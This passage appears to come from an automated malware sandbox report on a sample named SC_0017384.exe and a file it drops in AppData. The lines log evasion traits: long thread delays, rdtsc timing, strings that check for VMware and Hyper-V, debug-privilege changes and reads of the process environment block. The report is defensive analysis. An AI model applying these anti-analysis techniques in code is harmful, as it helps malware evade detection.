          Source: C:\Windows\SysWOW64\systray.exe TID: 5724Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -100000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5740Thread sleep count: 2179 > 30
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -99844s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -99661s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -99545s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -99436s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -99297s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -99184s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -99075s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -98968s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5716Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088Thread sleep time: -14757395258967632s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1004Thread sleep count: 9436 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1792Thread sleep time: -15679732462653109s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01835BA5 rdtsc
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SC_0017384.exeWindow / User API: threadDelayed 2343
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9412
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 736
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 703
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeWindow / User API: threadDelayed 2522
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeWindow / User API: threadDelayed 2179
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9589
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9436
          Source: C:\Users\user\Desktop\SC_0017384.exeAPI coverage: 9.4 %
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 100000
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99812
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99700
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99593
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99484
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99372
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99265
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99151
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99042
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 98916
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 100000
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99848
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99714
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99609
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99499
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99385
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99274
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99172
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99057
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 98953
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 98844
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 100000
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99844
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99661
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99545
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99436
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99297
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99184
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99075
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 98968
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000004.00000003.535831998.0000000008645000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
          Source: explorer.exe, 00000004.00000000.386129776.000000000091F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.552222750.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: Lvdnyvcvr.exe, 00000005.00000002.567915888.0000000005DED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000004.00000003.552222750.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.582466322.0000000004437000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.552222750.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: Lvdnyvcvr.exe, 00000009.00000002.574184145.0000000005E40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: SC_0017384.exe, 00000000.00000002.400969818.00000000068AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.535831998.0000000008645000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000003.533892507.000000000EFC5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.551309826.000000000EFCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.539351486.000000000EFC7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.551825356.000000000EFCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.593029452.000000000EFCB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01835BA5 rdtsc
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01784120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01784120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01784120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01784120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01784120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01780050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01780050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01834015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01834015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01822073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01831074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0181D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01793B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01793B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01835BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01771B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01771B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017F4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01783A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01765210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01765210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01765210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01765210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01778A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0181B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0181B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01787D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
